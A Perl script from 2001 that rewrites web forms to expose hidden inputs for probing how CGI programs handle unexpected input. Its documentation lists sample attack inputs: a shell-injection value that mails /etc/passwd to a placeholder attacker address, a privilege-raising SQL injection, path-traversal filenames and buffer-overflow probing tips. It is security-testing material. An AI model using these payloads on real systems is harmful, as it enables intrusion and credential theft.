#!/usr/bin/perl -Tw # Extract forms from an HTML file and build a new page for them. # See POD at end for more explanation. # # Eli the Bearded 26 April 2001 use strict; use CGI; # oh so handy for CGI parsing use URI; # oh so handy for normalizing URLs require LWP::UserAgent; # oh so handy for fetching pages package RewriteForm; # our package, a subclass of HTML::Parser use base "HTML::Parser";# oh so handy for HTML parsing use vars qw( $textarea $isoption $selname %radio $origpage %entity $parser $ua $request $response $query ); %entity = ( '&' => '&', '<' => '<', '>' => '>', ); $textarea = 0; $selname = &defselname(); sub defselname () { # What to show for a select without a name. return 'undef'; } # end &defselname sub defradioname () { # What to show for a radio input without a name. return 'undef'; } # end &defradioname sub defsulmultcount () { # How many inputs to show for a select multiple return 5; } # end &defsulmultcount sub headers() { # HTTP headers return "Content-Type: text/html\n\n"; } # end &headers # Callback for a tag start. sub start { # oo, text, hashref, arrayref, text my ($self, $tag, $attr, $attrseq, $origtext) = @_; my $esctext; my $newtext; my @allowed; my $selmult = 0; if ($tag =~ /^(form|input|select|option|textarea)$/i) { my $tagtype = lc($1); my $pre = ''; my $qstr = ''; my $post = "\n
\n"; my $skipthis = 0; # used for radio buttons after the first $esctext = "e($origtext); if ($tagtype ne 'option' and $isoption) { $isoption = 0; $pre .= "Was still in \$isoption state. Bad HTML? "; } if ($tagtype eq 'input') { my $inptype; @allowed = ( 'type', 'name', 'value', 'accept', 'checked' ); # We lc() the type since attribute values have the case preserved # by HTML::Parser. (Attribute names have been lower-cased for us.) if (defined($$attr{type}) and $$attr{type} = lc($$attr{type}) and ($$attr{type} eq 'hidden' or $$attr{type} eq 'password' or $$attr{type} eq 'checkbox' )) { $inptype = $$attr{type}; $$attr{type} = 'text'; } else { $inptype = $$attr{type}; } if (defined($inptype)) { $qstr = "e($inptype); $pre .= "Input type $qstr, "; } else { $pre .= "Input type unrecognized, "; } if (defined($$attr{name})) { $qstr = "e($$attr{name}); $pre .= "named $qstr, "; if (defined($inptype) and $inptype eq 'radio') { if (defined($radio{$qstr})) { $post = "Input values for the radio button in the $qstr text " . "input. " . $post; $skipthis = 1; } else { $radio{$qstr} = 1; $$attr{type} = 'text'; $post = "Use this text input for $qstr the radio buttons. " . $post; } } } else { $pre .= "no name found, "; } if (!defined($inptype) or ($inptype !~ /hidden|password|text/)) { if (defined($$attr{value})) { $qstr = "e($$attr{value}); $pre .= "with value $qstr, "; } else { $pre .= "with no value, "; } } if (defined($$attr{src})) { my $newimage = URI->new_abs( $$attr{src}, $origpage ); $$attr{src} = $newimage; push(@allowed, qw( src border height width )); } $pre .= "original HTML
$esctext\n
"; } elsif ($tagtype eq 'select') { $selname = &defselname(); # @allowed = ( 'name', 'multiple' ); if (defined($selname = $$attr{name})) { $selname = quote($selname); $pre .= "Turning select $selname into text input. Any option "; $pre .= "values for this select will be printed. "; @allowed = ( 'type', 'name' ); $tagtype='input'; $$attr{name} = 'text'; if(defined($$attr{multiple})) { $pre .= "Note that this select allows multiple inputs, so "; $pre .= "more than one text input follows. "; $selmult = 1; } } } elsif ($tagtype eq 'option') { @allowed = ( 'value', 'selected' ); $isoption = 1; $pre = "Original option HTML $esctext\n "; } elsif ($tagtype eq 'form') { @allowed = ( 'action', 'method', 'enctype', 'name' ); if (defined($$attr{action})) { my $newaction = URI->new_abs( $$attr{action}, $origpage ); $$attr{action} = $newaction; $qstr = "e($newaction); $pre .= "Form has action $qstr, "; } else { $pre .= "No action found for form, "; } if (defined($$attr{method})) { $qstr = "e($$attr{method}); $pre .= "method $qstr, "; } else { $pre .= "default method, "; } $pre .= "original HTML
$esctext\n
"; } elsif ($tagtype eq 'textarea') { @allowed = ( 'name', 'cols', 'rows', 'wrap' ); $textarea = 1; $pre .= "Original HTML
$esctext\n
"; } $newtext = '<' . $tagtype; for $_ (@allowed) { if (exists($$attr{$_})) { $newtext .= ' ' . $_; if (defined($$attr{$_})) { $newtext .= '="' . $$attr{$_} . '"'; } } } $newtext .= '>'; print $pre; if ($selmult) { my $i; print "
    \n"; for ($i = 1; $i <= &defsulmultcount(); $i++) { print '
  1. ' . $newtext . "\n"; } print "
\n"; } else { print $newtext unless ($isoption or $skipthis); } print $post unless ($textarea or $isoption); } } # end &start # Callback for a block of text sub text { my ($self, $text) = @_; if ($textarea) { print $text; } elsif ($isoption) { print "Option text for $selname $text
\n"; } } # end &text # Callback for a comment sub comment { my ($self, $comment) = @_; # We should never be here if $textarea is set, but who knows if ($textarea || $isoption) { print ""; } } # end &comment # Callback for close tag sub end { my ($self, $tag, $origtext) = @_; my $esctext; if ($tag =~ /^(form|input|select|option|textarea)$/i) { my $tagtype = lc($1); my $post; my $wasoption = $isoption; $esctext = $origtext; $esctext =~ s/([<>&])/$entity{$1}/g; if ($tagtype eq 'textarea') { $textarea = 0; } elsif ($tagtype eq 'option' or $tagtype eq 'select' or $tagtype eq 'form') { $isoption = 0; if ($tagtype ne 'option') { $selname = &defselname(); } } $post = "
Close tag was
$esctext\n
"; print $origtext unless $wasoption; print $post unless $wasoption; } } # end &end # Quote HTML for safe printing. sub quote ($) { my $string = shift; $string =~ s/([<>&])/$entity{$1}/g; return $string; } $origpage = $ARGV[0]; if(defined($origpage)) { if ($origpage =~ /^-+h/i) { print "Read POD in $0 for help.\n'perldoc $0' should work.\n"; exit; } if ($origpage =~ m<^(?i:http)(://[!-~]{1,2000})$>) { $origpage = "http$1"; } else { print "Unrecognized usage. Use as a CGI or read the POD for help.\n"; print "'perldoc $0' should work.\n"; exit; } } else { $query = new CGI; $origpage = $query->param('url'); print &headers(); } if (defined($origpage)) { if($origpage =~ m<^(?i:http)(://[!-~]{1,2000})$>) { # untainted $origpage = "http$1"; $ua = LWP::UserAgent->new; $request = HTTP::Request->new('GET', $origpage); $response = $ua->request($request); print "Form Rewriter\n"; print "

page is " . "e($origpage) . "
\n"; print "page size is " . length($response->content) . " bytes

\n"; $parser = new RewriteForm; $parser->parse($response->content); $parser->eof; } else { print "Form Rewriter\n"; print "Can't untaint url parameter.\n"; } } else { my $form = $ENV{SCRIPT_NAME}; print "Form Rewriter\n"; if (!defined($form)) { print "Can't find URL for internal form.\n"; exit; } print "
\n"; print "URL of page to process: \n"; print "
\n"; while() { if ($. == 1) { print "

POD documentation

\n\n";
    }
    print;
  }
  if ($. > 1) {
      print "\n\n
\n"; } else { print "\n

Didn't find POD to print\n"; } } __DATA__ =pod =head1 NAME extract-form : HTML form rewriter for command line or CGI use =head1 DESCRIPTION This script will fetch an HTML page via HTTP and extract all the forms out of it. The forms will be rewritten to expose all hidden inputs, etc, so that random values can be substituted in. Also Javascript in the page to verify inputs, etc, will be stripped. Useful for seeing how CGI programs deal with non-sanctioned input. During the course of rewriting the forms the script will convert ESELECTE tags, EINPUT TYPE=RADIOE, EINPUT TYPE=CHECKBOXE and EINPUT TYPE=HIDDENE to EINPUT TYPE=TEXTE. The EOPTIONEtags inside a ESELECTE will be displayed. (All radio buttons after the first in a series will be displayed rather than converted: one one value for the set would be sent by a browser.) =head1 EXAMPLES From the command line, provide a URL as the first argument: extract-form http://www.yahoo.com/ This script will fetch the page, rewrite the HTML and print it to standard out. Through a CGI interface, this takes a single parameter C which has the URL of the page to process. It rewrites the HTML and returns it for display in the browser. =head1 IDEAS FOR TESTING Some CGI programmers seem to think that variables whose values come from the HTML rather than the user are safe. This form rewriter makes those variables more visible for poking random junk in. There are probably four types of inputs that are most useful to probe. To an external tester those types are often not inheritantly obvious. =over 4 =item 1 arguments passed to Perl's C These types of input offer the most power. Clever use of C<&>, C<|>, C<;> and other shell meta-characters can cause all sorts of things to happen when used in an C call. A CGI that sends mail might have a hidden variable that has the recipient's address, which might be used like this: open(MAIL,"| $sendmail '$MAILTO'") If the MAILTO value were changed to be: someone@example.com' ; /bin/mail blackhat@example.net < '/etc/passwd Then the original mail would still be sent, and then the blackhat would get the password file. =item 2 items that get used in SQL statements With these you can potentially change the meaning of an SQL statement dramatically, much like the shell example above. rain forest puppy wrote a nice advisory for Bugtraq a while ago (RFP2K01: How I hacked Packetstorm, B) that explains how he found that numerical values in the queries at Packetstorm B were not being checked. So he changed a C<5> to 5, Status='Administrator', Security=100, to up his privledges on the system. =item 3 filenames opened safely but displayed in the HTML These might be templates or page fragments to display after a form is processed. It might not be opened by Perl or might be used in a C. With these you might be able to view any file on the system that the CGI can read and you can think up the name of. Consider, for example, a filename like one of these: /etc/passwd ../../../../../../../../../../../../etc/passwd In Unix, C<..> at the root level leaves you at the root level. So that second filename is good for anywhere up to twelve levels deep. =item 4 buffer overflows Above I said that the Perl open vulnerability gave the most power. I lied. Buffer overflows can give you even more power if you can get machine code in the overflow to execute. The way to probe for a buffer overflow is to try inserting very long values into each parameter. "Very long" can be a few hundred characters to a few thousand. Typically people seem to use the letter C repeated. Once a buffer overflow is found, exploiting it can be tricky. You need to know the type of computer running the CGI (services like Netcraft, B, can help you identify the system). You need to have a suitible shell code to use. Aleph One's paper "Smashing The Stack For Fun And Profit", B, explains how to craft shell code or a search engine might find you one. =back =head1 IDEAS FOR IMPROVEMENT It would be really nice if the script could figure out what text is used to label form inputs so that could be printed with the rewritten form. Although HTML 4.0 includes a ELABELE tag for just that purpose, this script does not attempt to use them. Most web pages don't have them, anyway. It could be useful if the script could add additional form elements. It could be useful if the script could add additional form elements. Some CGI programs check the value of the submit button, but this does not provide a way to alter that. This is slightly tricky to alter since if there are multiple submit buttons they could have different C attributes, but the browser would only return the name and value of the one clicked. Also image submit buttons return two values, a C<{name}.x> and a C<{name}.y> with pixel coordinates to indicate where in the image the user clicked. It would be nicer if the script could be flexible about how many inputs to provide for a ESELECT MULTIPLEE statement. It would be handy if the script could automatically generate long strings for buffer overflow testing. =head1 COPYRIGHT This script is by Eli the Bearded. The home source for it is his directory at CPAN, I. This script is released to the public domain. Modifications and redistribution is encouraged. Leaving an attribution to Eli the Bearded would be nice, but is not required. =head1 OSNAMES This should not have any OS dependencies. NCSA and Apache style environment variables might be needed for CGI use. =head1 CPAN INFO =head1 SCRIPT CATEGORIES Web CGI =head1 README HTML form rewriter for command line or CGI use. Rewritten forms have hidden inputs exposed for probing. =head1 PREREQUISITES This script uses the C, C, C, C, C, and C modules. Either version 2 or 3 of HTML::Parser should work. =head1 COREQUISITES The CGI module really should be optional if not running as a CGI, but this is not written to allow that. =cut